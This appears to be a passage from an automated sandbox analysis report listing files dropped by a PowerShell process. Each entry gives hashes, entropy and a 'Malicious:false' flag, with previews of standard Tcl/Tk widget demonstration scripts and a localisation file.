                                                                                                                                                                                                                      Preview:# anilabel.tcl --..#..# This demonstration script creates a toplevel window containing..# several animated label widgets.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .anilabel..catch {destroy $w}..toplevel $w..wm title $w "Animated Label Demonstration"..wm iconname $w "anilabel"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "Four animated labels are displayed below; each of the labels on the left is animated by making the text message inside it appear to scroll, and the label on the right is animated by animating the image that it displays."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....# Ensure that this this is an array..array set animationCallbacks {}....## This callback is the core of how to do animation in Tcl/Tk; all..## animations work in basically the same way, with a
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (309), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3598
                                                                                                                                                                                                                      Entropy (8bit):4.7645273656561065
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:i1OgZNkJSv31u3b5k7Nq1WE2t4uwMxFJlL/9:MOGNkIv3189gy2tqMxFJlL/9
                                                                                                                                                                                                                      MD5:0CEC163B4DDFBAA9DC0319766F23FA09
                                                                                                                                                                                                                      SHA1:7655C2A73AA1E906C67C1024B92B63F62647D346
                                                                                                                                                                                                                      SHA-256:C4F59254D921B440BB3F6B6CC6FA1B2D24F9D8547A286B98285EC4F0C45702C9
                                                                                                                                                                                                                      SHA-512:3BE6A9B14625E89C5219CBEDE06D2445B7701C8E167510D3904A06C2C8511FC2BCBD5AA95584D4829497940B5D7FF38A19F38A8C1B8E334786799391C8DD41FD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# aniwave.tcl --..#..# This demonstration script illustrates how to adjust canvas item..# coordinates in a way that does something fairly similar to waveform..# display.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .aniwave..catch {destroy $w}..toplevel $w..wm title $w "Animated Wave Demonstration"..wm iconname $w "aniwave"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "This demonstration contains a canvas widget with a line item inside it. The animation routines work by adjusting the coordinates list of the line; a trace on a variable is used so updates to the variable result in a change of position of the line."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....# Create a canvas large enough to hold the wave. In fact, the wave..# sticks off both sides of the canvas to prevent vis
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (438), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8351
                                                                                                                                                                                                                      Entropy (8bit):5.0551644239299725
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:rrOBZMJ8zuORfN1eSBTT3PE6OFA6z68sdUfRMoUU:vhsq6OFA6z68qUia
                                                                                                                                                                                                                      MD5:A66809316C203B5A2117B1A499301EBA
                                                                                                                                                                                                                      SHA1:1A589343372F2B2FB1C058771105DD7DF8DE0D44
                                                                                                                                                                                                                      SHA-256:818BD1A13B4AFC9AB897DA219CFC174C477D1AA55F9DB5DA005D4E5AE1A03806
                                                                                                                                                                                                                      SHA-512:9F64C35B6373327142501382B34EA21D35945A93213352B8C8229F79E040861316FD5A73ADA6BA64265D51D4C125F9CB0FB4CFA0CA0569CD396B476965C2BCE4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# arrow.tcl --..#..# This demonstration script creates a canvas widget that displays a..# large line with an arrowhead whose shape can be edited interactively.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....# arrowSetup --..# This procedure regenerates all the text and graphics in the canvas..# window. It's called when the canvas is initially created, and also..# whenever any of the parameters of the arrow head are changed..# interactively...#..# Arguments:..# c -..Name of the canvas widget.....proc arrowSetup c {.. upvar #0 demo_arrowInfo v.... # Remember the current box, if there is one..... set tags [$c gettags current].. if {$tags != ""} {...set cur [lindex $tags [lsearch -glob $tags box?]].. } else {...set cur "".. }.... # Create the arrow and outline..... $c delete all.. eval {$c create line $v(x1) $v(y) $v(x2) $v(y) -arrow last \... -width [expr {10*$v(width)}] -arro
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (489), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3156
                                                                                                                                                                                                                      Entropy (8bit):4.829182818182745
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FOvdII8lYa9izSgL12PSyF3lyFHyF5yFMyFdqMdhd5dtdjdFdc:FOvIuZzrWSyF3lyFHyF5yFMyFdvdhd5Y
                                                                                                                                                                                                                      MD5:82923BA1E95ECBEAE5447BD0E37B04B1
                                                                                                                                                                                                                      SHA1:A318D742B095D724BAC5C862812BA7F0859997F3
                                                                                                                                                                                                                      SHA-256:941EE3F0080D24D6942160813ACF9BACAB5C52F082756023CD05E3EA28E71B02
                                                                                                                                                                                                                      SHA-512:D1E4DA4144E69493DE95D08AEB61D568CB130B87A5561746E1CB658D401297403016AB58CFB62318684C847AEA0277D1D690E0FA78ECECFAAD4A945CFB3F38DD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# bind.tcl --..#..# This demonstration script creates a text widget with bindings set..# up for hypertext-like effects.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .bind..catch {destroy $w}..toplevel $w..wm title $w "Text Demonstration - Tag Bindings"..wm iconname $w "bind"..positionWindow $w....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....text $w.text -yscrollcommand "$w.scroll set" -setgrid true \...-width 60 -height 24 -font $font -wrap word..ttk::scrollbar $w.scroll -command "$w.text yview"..pack $w.scroll -side right -fill y..pack $w.text -expand yes -fill both....# Set up display styles.....if {[winfo depth $w] > 1} {.. set bold "-background #43ce80 -relief raised -borderwidth 1".. set normal "-background {} -relief flat"..} else {.. set bold "-foreground white -background black".. set normal "-foreground {} -backgroun
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1463
                                                                                                                                                                                                                      Entropy (8bit):4.82114804123206
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:aH14IvjOXegX4+6nhvPib3ANcF/AJA/oR+uI/82chzgPP5p0zP+I0kHvUDE:8ZrOXe3J8LANcF/AJooRn4jqgPYLlaDE
                                                                                                                                                                                                                      MD5:3C71575C808FA2F4B5A39D6B35C0D11F
                                                                                                                                                                                                                      SHA1:404063F4EBBFC0DB943318986727BD99E4045176
                                                                                                                                                                                                                      SHA-256:B6C1F7B01F04B7880616E2AFFE948FC4645BAE51A1DF7F51E545E0896845F8FE
                                                                                                                                                                                                                      SHA-512:677ED59E2D77857E5A2287D0EA0D21034236D491459BC7D55A2176D75F2E8491D01926EFAC6A7FA2AA2ED73ACC567BAD4EF5AA01DC13F9A36200D996A964FFBC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# bitmap.tcl --..#..# This demonstration script creates a toplevel window that displays..# all of Tk's built-in bitmaps.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....# bitmapRow --..# Create a row of bitmap items in a window...#..# Arguments:..# w -..The window that is to contain the row...# args -.The names of one or more bitmaps, which will be displayed..#..in a new row across the bottom of w along with their..#..names.....proc bitmapRow {w args} {.. frame $w.. pack $w -side top -fill both.. set i 0.. foreach bitmap $args {...frame $w.$i...pack $w.$i -side left -fill both -pady .25c -padx .25c...label $w.$i.bitmap -bitmap $bitmap...label $w.$i.label -text $bitmap -width 9...pack $w.$i.label $w.$i.bitmap -side bottom...incr i.. }..}....set w .bitmap..catch {destroy $w}..toplevel $w..wm title $w "Bitmap Demonstration"..wm iconname $w "bitmap"..positionWindow $w....label $w.msg -font $font
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1821
                                                                                                                                                                                                                      Entropy (8bit):4.829069461080132
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:dJJ/0vwxN8UMjEl/GaMbdAKSGgTkWIW97QlnJd5Dww4iaiF:drMvLU2C9K7ggWIW5QRJwJkF
                                                                                                                                                                                                                      MD5:39D5298EDA59D2E2AC25C818789A5A1A
                                                                                                                                                                                                                      SHA1:0C02A7373CA16D64C370351F6A0DD5FD67E1551A
                                                                                                                                                                                                                      SHA-256:D5A6843453FA7BEEC0589E07351799708B27CA0D3FEF640190DE01344259F11D
                                                                                                                                                                                                                      SHA-512:4282A6FD5749C698FB7581F2E3A73165843E8A5BA235B48F7E8800458818B2A603E74CCC0C5F4D1932633CB213292A9963C02F19531A6EF414B8B7A6A1605C0C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" ${1+"$@"}....# browse --..# This script generates a directory browser, which lists the working..# directory and allows you to open files or subdirectories by..# double-clicking.....package require Tk....# Create a scrollbar on the right side of the main window and a listbox..# on the left side.....scrollbar .scroll -command ".list yview"..pack .scroll -side right -fill y..listbox .list -yscroll ".scroll set" -relief sunken -width 20 -height 20 \...-setgrid yes..pack .list -side left -fill both -expand yes..wm minsize . 1 1....# The procedure below is invoked to open a browser on a given file; if the..# file is a directory then another instance of this program is invoked; if..# the file is a regular file then the Mx editor is invoked to display..# the file.....set browseScript [file join [pwd] $argv0]..proc browse {dir file} {.. global env browseScript.. if {[string compare $dir "."] != 0} {set file $dir/$file}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1551
                                                                                                                                                                                                                      Entropy (8bit):4.8673461582756055
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:5H14ImXegXoXBZmchzV7pEfuIlaRM75p0sR+3C+hBinXqKkKRcRBRfPPRrD:fZmXetBYq52fuPJSihwn6HKivVPtD
                                                                                                                                                                                                                      MD5:32E1CD4D742DE96C741B5D9A7A382C6B
                                                                                                                                                                                                                      SHA1:F06618CE18874C73171F0576D2F1DD2E934BC570
                                                                                                                                                                                                                      SHA-256:6FF1E752E51D72D8079B499865AFD3C3CB9F4C4FD69E48C0E5EC5D701AA6A1D5
                                                                                                                                                                                                                      SHA-512:E9F3D8CE8E0D08F325D6731663C682EE53E9AE96F92C777CF033933C7AE9368723382543F7E4C94535C4D1C3061319C5E105B3DFC4589907B0CCC14001C04DAF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# button.tcl --..#..# This demonstration script creates a toplevel window containing..# several button widgets.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .button..catch {destroy $w}..toplevel $w..wm title $w "Button Demonstration"..wm iconname $w "button"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "If you click on any of the four buttons below, the background of the button area will change to the color indicated in the button. You can press Tab to move among the buttons, then press Space to invoke the current button."..pack $w.msg -side top....## See Code / Dismiss buttons..pack [addSeeDismiss $w.buttons $w] -side bottom -fill x....proc colorrefresh {w col} {.. $w configure -bg $col.. if {[tk windowingsystem] eq "aqua"} {...# set highlightbackground of all buttons in $w...set l [list $w]...while {[llength $l]} {... set l [concat [lassign $l b] [w
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (476), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2349
                                                                                                                                                                                                                      Entropy (8bit):4.7648177806522956
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:4wZSXezj4qa2akd4Mw5ON4w6g1zQ3BhTmgpoo3cZcqedUksHFNhDTpDcDvX:41OIXzMjiuoBhTmgptM+/slPRIzX
                                                                                                                                                                                                                      MD5:99B8A073BCA100760387FC1E2EDD7CA0
                                                                                                                                                                                                                      SHA1:D930F1A32553D18B1D64D081C6896DA20A54ED6D
                                                                                                                                                                                                                      SHA-256:A5B535512FE3C68183FAAA55FB1029B7DE651BEC1FD0E7F50064D8D73E080FFD
                                                                                                                                                                                                                      SHA-512:0550672DCFF652532DC2A2DDDF39E999C9F6FB5B550AF903894DD9C9E265BAE0946F728D78C61DAAAEC0F61C0B799269CA3D84555332253D9757F2D1464D589F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# check.tcl --..#..# This demonstration script creates a toplevel window containing..# several checkbuttons.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .check..catch {destroy $w}..toplevel $w..wm title $w "Checkbutton Demonstration"..wm iconname $w "check"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "Four checkbuttons are displayed below. If you click on a button, it will toggle the button's selection state and set a Tcl variable to a value indicating the state of the checkbutton. The first button also follows the state of the other three. If only some of the three are checked, the first button will display the tri-state mode. Click the \"See Variables\" button to see the current values of the variables."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w [list safety wipers brakes sober]]..pack $btns -side bott
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1485
                                                                                                                                                                                                                      Entropy (8bit):4.718760241375116
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:6cHqXegXxEpwchz+Nb5p0zHlJ51qduTiVCvuMybi0EokmAEs4ZHEc:6vXe8EpwqyEjl+u4CFybi0YNEJZHr
                                                                                                                                                                                                                      MD5:855847465BCD9FD44E4AF9A34F9B9B86
                                                                                                                                                                                                                      SHA1:5AA7319C313DF6C4C87B6274F10E9E494E9D90E5
                                                                                                                                                                                                                      SHA-256:7E7FD178C20F07B96FF51CB375E6AD422807D026A0C5B57DEB5E5ACAD2661783
                                                                                                                                                                                                                      SHA-512:CD0E15E45BE80911BF1090B69A3680E1A60A9F9EEE77C50B48AAD89193C5D9E3508BFF666107BF949D8AC920CD0D8553BABC5B265CE2E6342CF03970FCAA0BC6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# clrpick.tcl --..#..# This demonstration script prompts the user to select a color.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .clrpick..catch {destroy $w}..toplevel $w..wm title $w "Color Selection Dialog"..wm iconname $w "colors"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "Press the buttons below to choose the foreground and background colors for the widgets in this window."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....button $w.back -text "Set background color ..." \.. -command \.. "setColor $w $w.back background {-background -highlightbackground}"..button $w.fore -text "Set foreground color ..." \.. -command \.. "setColor $w $w.back foreground -foreground"....pack $w.back $w.fore -side top -anchor c -pady 2m....proc setColor {w button name options} {..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (367), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5101
                                                                                                                                                                                                                      Entropy (8bit):4.984428014362412
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:RFSO+j8Ht2/WIOC9HTWZKVQsbE8Hy2t58R3kICFBpyfU:RwO7rIOXsbE8H7L3
                                                                                                                                                                                                                      MD5:14C6E9E0B4D5B9708482BB703611DC42
                                                                                                                                                                                                                      SHA1:8319C9E969F0694C5152217251637DD7290FC6AC
                                                                                                                                                                                                                      SHA-256:FDE271DC94CC6D81EC874188E80FCDD8854A40FB1C45F6ECBFB9CCE8991A7D3C
                                                                                                                                                                                                                      SHA-512:B553F1AF6B8828A4022A4EBC0D7919E51F9E13E355A79CF3284A2BC99D1B3A8EDF8155A14FD5C5056657A233230863AECE1240C6F0894ED83888DD70DABDD99A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# colors.tcl --..#..# This demonstration script creates a listbox widget that displays..# many of the colors from the X color database. You can click on..# a color to change the application's palette.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .colors..catch {destroy $w}..toplevel $w..wm title $w "Listbox Demonstration (colors)"..wm iconname $w "Listbox"..positionWindow $w....label $w.msg -font $font -wraplength 4i -justify left -text "A listbox containing several color names is displayed below, along with a scrollbar. You can scan the list either using the scrollbar or by dragging in the listbox window with button 2 pressed. If you double-click button 1 on a color, then the application's color palette will be set to match that color"..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....frame $w.frame -borderwidth
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2024
                                                                                                                                                                                                                      Entropy (8bit):4.984788909781672
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:51BXe9UufPTut8wIH/0h5HheSxowIBHy8sM:1OHfPSmghesobEFM
                                                                                                                                                                                                                      MD5:71C2B51F457FEB15B430D3387868CA71
                                                                                                                                                                                                                      SHA1:FE811687D02B4A1EEBFF40B46B27065E07A5C471
                                                                                                                                                                                                                      SHA-256:85BA1D5D4265CC2949B011A0CA7823E600D0DFA38B5155876E892C125499A8E2
                                                                                                                                                                                                                      SHA-512:648722E1EC1416AF5DE6A4CD33EEAE615D52EFD093054781D6F85A50CD2DF03F0F2AB51C3B8CD761BAFF7B9F2E1E2F6D715FBCBC32F5927E45A323B66A4F60CC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# combo.tcl --..#..# This demonstration script creates several combobox widgets.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .combo..catch {destroy $w}..toplevel $w..wm title $w "Combobox Demonstration"..wm iconname $w "combo"..positionWindow $w....ttk::label $w.msg -font $font -wraplength 5i -justify left -text "Three different\...combo-boxes are displayed below. You can add characters to the first\...one by pointing, clicking and typing, just as with an entry; pressing\...Return will cause the current value to be added to the list that is\...selectable from the drop-down list, and you can choose other values\...by pressing the Down key, using the arrow keys to pick another one,\...and pressing Return again. The second combo-box is fixed to a\...particular value, and cannot be modified at all. The third one only\...allows you to select values from its drop-down list of Australian\...cities."..pa
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5213
                                                                                                                                                                                                                      Entropy (8bit):5.022694401829121
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:NyO9OuzrK6F8FsYkratjTGzL6X8jGCk3C98GFgvIcgoRbJKd1dAfVxbfVg+Sh:NyOwuK6F8FEzVCCk3C98GFgvIcgo1J+t
                                                                                                                                                                                                                      MD5:D99368F1EBC72E6EB1FCCD06165CD038
                                                                                                                                                                                                                      SHA1:F039F38433FAA47984C855585B7EA4D057E50D92
                                                                                                                                                                                                                      SHA-256:119629EF0782502A6F572499FD3F47F4D69C3E0F3B443B24F1015DB7C85839F7
                                                                                                                                                                                                                      SHA-512:35614F621AC0AE6500EEFD996B6F5C7F926ED4780E231C1D80903FD16C1BE84AEAF5425D2FB50076004DE5368C0AE13E6DC0F9D471B605F10412AE55A318B186
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# cscroll.tcl --..#..# This demonstration script creates a simple canvas that can be..# scrolled in two dimensions.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .cscroll..catch {destroy $w}..toplevel $w..wm title $w "Scrollable Canvas Demonstration"..wm iconname $w "cscroll"..positionWindow $w..set c $w.c....label $w.msg -font $font -wraplength 4i -justify left -text "This window displays a canvas widget that can be scrolled either using the scrollbars or by dragging with button 2 in the canvas. If you click button 1 on one of the rectangles, its indices will be printed on stdout."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....frame $w.grid..scrollbar $w.hscroll -orient horizontal -command "$c xview"..scrollbar $w.vscroll -command "$c yview"..canvas $c -relief sunken -borderwidth 2 -scrollregion {-11c -11c 50c 2
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (385), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6381
                                                                                                                                                                                                                      Entropy (8bit):4.943353272720524
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:38OUAeL95yU9xf9VhoPdX9Q9b9vXR0f0LqJsmsk+10k:sYeRgU9xf9Vh06BY0P
                                                                                                                                                                                                                      MD5:24670389FFF37402CDF51C3215C44138
                                                                                                                                                                                                                      SHA1:18D114FF619B3F790480C272D8498CF7B6DD32F1
                                                                                                                                                                                                                      SHA-256:6F7DAC4FF555C9CCAABEEF89A17F234DC4B5CA818848B99089FE42D5DA4704EE
                                                                                                                                                                                                                      SHA-512:D743FCD796AC3059FC07E4761B81017198F8F2502AA51CCB3B818478F99BCC051F61467252FA8CEAF14954B4A8A09E5DCEAB69699E56F675BB98AAD7D73DB822
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ctext.tcl --..#..# This demonstration script creates a canvas widget with a text..# item that can be edited and reconfigured in various ways.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .ctext..catch {destroy $w}..toplevel $w..wm title $w "Canvas Text Demonstration"..wm iconname $w "Text"..positionWindow $w..set c $w.c....label $w.msg -font $font -wraplength 5i -justify left -text "This window displays a string of text to demonstrate the text facilities of canvas widgets. You can click in the boxes to adjust the position of the text relative to its positioning point or change its justification, and on a pie slice to change its angle. The text also supports the following simple bindings for editing:.. 1. You can point, click, and type... 2. You can also select with button 1... 3. You can copy the selection to the mouse position with button 2... 4. Backspace and Control+h delete the selecti
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (503), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):999
                                                                                                                                                                                                                      Entropy (8bit):4.7002401456486735
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:CH14bXVlx6F6FIsH6PvSMzzxI1JvN9rxFhb8bBzmAf:UkXIFuIRPamlI1D9rxF6
                                                                                                                                                                                                                      MD5:023AE0321F97A60AB7D1B6B7CAF772E4
                                                                                                                                                                                                                      SHA1:BE2ECD45A210C1EDE20C2637E926B29566FE780D
                                                                                                                                                                                                                      SHA-256:61C48D3C23D6A2A3C0C5229AE9838884F77FA7C2514F53634791210F3A13A97F
                                                                                                                                                                                                                      SHA-512:AD200897D00470C0B21F1B38095E7A255703C13C9ED4B49C5983EF5DDA1981D60FEB77AFFA718120DD11548C0078DB3CA036F453FA9CA54ABFE7E45A9A8A59CB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# dialog1.tcl --..#..# This demonstration script creates a dialog box with a local grab.....interp create child..load {} Tk child..child eval {.. wm title . child.. wm geometry . +700+30.. pack [text .t -width 30 -height 10]..}....after idle {.dialog1.msg configure -wraplength 4i}..set i [tk_dialog .dialog1 "Dialog with local grab" {This is a modal dialog box. It uses Tk's "grab" command to create a "local grab" on the dialog box. The grab prevents any mouse or keyboard events from getting to any other windows in the application until you have answered the dialog by invoking one of the buttons below. However, you can still interact with other applications. For example, you should be able to edit text in the window named "child" which was created by a child interpreter.} \..info 0 OK Cancel {Show Code}]....switch $i {.. 0 {puts "You pressed OK"}.. 1 {puts "You pressed Cancel"}.. 2 {showCode .dialog1}..}....if {[interp exists child]} {.. interp delete child..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (503), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):846
                                                                                                                                                                                                                      Entropy (8bit):4.69368838537225
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:vHFabQERb9LxFG5kFOIPk+AERLZbiA3JWBBtSIFouSg9zPO+J+Ub8bBmJ:vH14bDFYkFjk+dbD3JwBJ2s7O+pb8bBa
                                                                                                                                                                                                                      MD5:9E1CD52929693517CF02DBA5A60D0D38
                                                                                                                                                                                                                      SHA1:85E5E24843E253577A4B02575192FE680F24EC8B
                                                                                                                                                                                                                      SHA-256:247082A303E8D699011D6126361A842DCF53164AE9699D2FDA0492D691D96C53
                                                                                                                                                                                                                      SHA-512:85E05CB1014CB53F6F7347E33027C6199D46019724B2F1155F6443C9E454F6FC1ECBC87B4705E4401986720DB102263E40B4B02831FF9684F879BECB43874CD4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# dialog2.tcl --..#..# This demonstration script creates a dialog box with a global grab.....after idle {.. .dialog2.msg configure -wraplength 4i..}..after 100 {.. grab -global .dialog2..}..set i [tk_dialog .dialog2 "Dialog with global grab" {This dialog box uses a global grab. If you are using an X11 window manager you will be prevented from interacting with anything on your display until you invoke one of the buttons below. This is almost always a bad idea; don't use global grabs with X11 unless you're truly desperate. On macOS systems you will not be able to interact with any window belonging to this process, but interaction with other macOS Applications will still be possible.}\..warning 0 OK Cancel {Show Code}]....switch $i {.. 0 {puts "You pressed OK"}.. 1 {puts "You pressed Cancel"}.. 2 {showCode .dialog2}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3964
                                                                                                                                                                                                                      Entropy (8bit):4.6374227700709385
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:P9HAru1YDFZ0ZkgNWe5j10BZWL3ZkwPM6:tauc0ZkRc1eZGZkwPM6
                                                                                                                                                                                                                      MD5:C0793F9B6AB90A4D386C06686BA9321C
                                                                                                                                                                                                                      SHA1:B1EDF9A82834021CE14AE1C3425B78C20A0098CF
                                                                                                                                                                                                                      SHA-256:3B3D80F5E884A94C27A97FD46DDF2947FEEDC7C960BBFA359BDEA6DDD1E0DF87
                                                                                                                                                                                                                      SHA-512:E1BA01F412BCCB0F7EDC1CF70011EF8D620A737FD536EC33EDBDC7023DEA44202928C60F5932AB01E0F5557395393A1086175ECE9D651B480D8EC7FD44ED8771
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:::msgcat::mcset en "Widget Demonstration"..::msgcat::mcset en "tkWidgetDemo"..::msgcat::mcset en "&File"..::msgcat::mcset en "About..."..::msgcat::mcset en "&About..."..::msgcat::mcset en "<F1>"..::msgcat::mcset en "&Quit"..::msgcat::mcset en "Meta+Q"..;# Displayed hotkey..::msgcat::mcset en "Meta-q"..;# Actual binding sequence..::msgcat::mcset en "Ctrl+Q"..;# Displayed hotkey..::msgcat::mcset en "Control-q"..;# Actual binding sequence..::msgcat::mcset en "Variable values"..::msgcat::mcset en "Variable values:"..::msgcat::mcset en "OK"..::msgcat::mcset en "Run the \"%s\" sample program"..::msgcat::mcset en "Dismiss"..::msgcat::mcset en "Rerun Demo"..::msgcat::mcset en "Demo code: %s"..::msgcat::mcset en "About Widget Demo"..::msgcat::mcset en "Tk widget demonstration application"..::msgcat::mcset en "Copyright . %s"..::msgcat::mcset en ".. @@title.. Tk Widget Demonstrations.. @@newline.. @@normal.. @@newline.... This application provides a front end for several short
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (584), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1435
